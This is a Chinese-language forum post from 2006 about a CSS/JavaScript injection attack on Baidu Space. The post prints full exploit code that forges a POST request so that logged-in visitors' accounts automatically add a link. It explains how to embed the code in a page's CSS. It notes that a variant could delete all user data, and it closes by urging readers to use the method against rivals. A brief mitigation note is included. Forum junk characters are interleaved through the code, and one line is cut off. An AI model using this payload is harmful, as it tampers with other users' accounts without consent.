过期域名预定抢注

 找回密碼
 免费注册

想讓你對手在百度中除名麼??試下吧

[複製鏈接]
發表於 2006-8-9 19:43:36 | 顯示全部樓層 |閱讀模式
自己的百度空間,瘋狂複製css代碼。但與此同時也出現了百度空間的網絡黑手,利用百度空間的功能,加入自己的代碼,而這些代碼又是惡意的,導致百度空間的用戶遭遇危險。
' o  W$ f& n( o4 O& k) S) s2 u% r4 X1 E; p: A
  這是一個網友發來的短信求助,原文如下: 0 y$ A. U( L; ~6 H$ T4 o8 L% |* y

' s% E+ w! h3 o# X5 e  q# a$ Z  有個黑客用javascript把我的鏈接改了..並威脅我如果刪除連接就刪除我的空間,最怕的就是這樣的人..我想問您瞭解一下他能用同樣的手段篡改我頁面的其他信息嗎..最好能告訴小弟對付這樣的人的辦法,我實在沒轍了,好鬱悶..謝謝..   a+ w3 @( R  k
7 M- ?# `" |' s2 {+ q. s' G5 Q
  當時筆者找到該"黑客"的空間,輕鬆發現其利用css代碼加入js代碼,然後又利用js代碼的功能,分析百度空間在提交數據時的參數,構造出來一個惡意的js代碼,功能是提交一個加入友情鏈接的請求到百度空間,導致訪問該網站的已登陸百度空間用戶在自己空間上自動的加一個友情鏈接.
% z2 K' `0 c+ O9 e- w+ |/ X% D1 x% F  [4 C
  下邊是利用代碼: javascript:document.body.onload = function(){ $ c9 P. P/ u$ p

" {& o' m0 t# G2 {. ^: k) @/ k9 s) g6 \! o5 U* ]5 h- f
var req = null; " x3 d8 F) s7 w1 P. q  v7 Z; ~" v
if(window.XMLHttpRequest) req = new XMLHttpRequest();
& K. S2 @/ ^7 V# \9 n5 melse if(window.ActiveXObject){   I6 U3 ~- ^# a% p0 X
var msxml = new Array('MSXML2.XMLHTTP.5.0', 'MSXML2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP', 'Microsoft.XMLHTTP');
0 X/ r* r" m* \5 u, ^2 r5 m8 Xfor(var i=0;i ! L1 E  @7 q" D% ?5 _
try{req.overrideMimeType('text/xml')}catch(e){}
; K8 Q* G0 \6 v. x} $ L: W9 v, o2 W; U
req.open('get','.',false);
6 D* {" q7 n! Z7 O0 L( Preq.send(); ) q0 v8 C7 j: f0 [% a1 G8 J
var s=req.responseText; 7 U. R3 `+ b, o4 J! [/ P
p=s.indexOf('passport.baidu.com/?logout');
6 b2 R1 M5 I4 Q5 f" K. Dif(p>0) ' \: n. e" g: g; e" b8 W# ^7 Q3 U6 _
{   _, L6 _0 t. O; K
p=s.indexOf('');
& h; E/ T, l0 i0 dif(p>0) & X) X& V5 I0 q, C* K7 ^
{
1 _- M' \" b6 W, ]p=s.indexOf('/',p);
: D# f! O7 i% q6 M$ jp2=s.indexOf(String.fromCharCode(34),p);
1 H; j( B& A1 G. w: wvar user=s.substring(p+1,p2); 1 [+ f* Y" i/ Y, r. Q" d' }
var name='+%B0%D9%B6%C8%BF%D5%BC%E4%B7%A2%CC%FB%D6%FA%CA%D6 '; . \& c5 s6 ?" u* e" n0 C
var link='http://hi.baidu.com/haomm'; . I1 E& Z& Z9 |
var desc='%CA%B9%C4%E3%B5%C4%B0%D9%B6%C8%BF%D5%BC%E4%D6%A7%B3%D6html%B7%A2%CC%FB'; - @8 i( e  ^* g. n+ o4 D: o
var url='/'+user+'/commit'; * z" Q! @) j9 W! o+ e
var data='ct=6&cm=1&spRef='+escape('http://hi.baidu.com/'+user)+'%2Fmodify%2Fbuddylink%2F0&spBuddyName='+escape(name)+'&spBuddyURL='+escape(link)+'&spBuddyIntro='+escape(desc);
2 r- o' }9 y& X" N' l+ zreq.open('post',url,false); ' z# S5 _  b! A, @& l  k8 X
req.send(data); & {: k- F, o8 u# _
} $ l( e' Y8 l- |3 f& r
}
# h$ q- ^, h5 I: \4 n" l}
6 n2 `* T. C5 w' H% h' p
5 ^8 y# o2 y1 i1 |& K
) k+ Q  C% z5 E6 j5 ]1 D
  分析:
7 Z0 t0 ?: V: b% d0 s$ t
+ }- {- Z  u& t1 z$ E5 N  該方法危險等級:高級.構造相應的js代碼可以刪除用戶空間的所有數據.該漏洞目前未發現有惡意刪除的現象,但已足夠危險,請用戶小心. 3 _1 z1 P+ X- |) l7 q4 V

( S! T! }: S! d- @1 V- q2 G$ \  解決辦法:
! e. p! N( g4 R3 c3 @* k/ l/ G
  由於攻擊者可能利用任何用戶名的百度空間提交增加,刪除,更改的鏈接,所以目前沒有完美解決辦法.
+ B" }' `( l+ V  Y5 x! A
( G$ B3 ]1 Z1 q  給已經受害者解決辦法:刪除惡意鏈接,不再在登陸的情況下訪問其空間鏈接. 4 d; Y9 o1 C7 D$ R4 G

2 x) o/ u- J1 {5 d! [  利用方法,演示及聲明: , v; V2 o- u3 Y0 W+ m
. O) E/ Q2 Q1 |5 b/ }% \* E
  本空間加入了該漏洞代碼的利用演示,使用方法:在自己空間css裡面找到#header{},在裡面加入上述代碼即可.形式如:#header{height:200px;background:url("上文js代碼");}請小心使用。6 p; ^: r; A% ?7 O! f
7 c/ X6 W7 |0 t; `( l

$ V$ @7 ]! z3 z( w
2 `5 V8 Z: R1 O/ V1 b" r腦子裡模擬你是 你對手的站長 
: F9 z2 V9 `4 a, O) B' @- C9 y1 O0 l利用以上方法強姦百度
您需要登錄後才可以回帖 登錄 | 免费注册

本版積分規則

點基

GMT+8, 2026-3-15 03:47

By DZ X3.5

小黑屋

快速回復 返回頂部 返回列表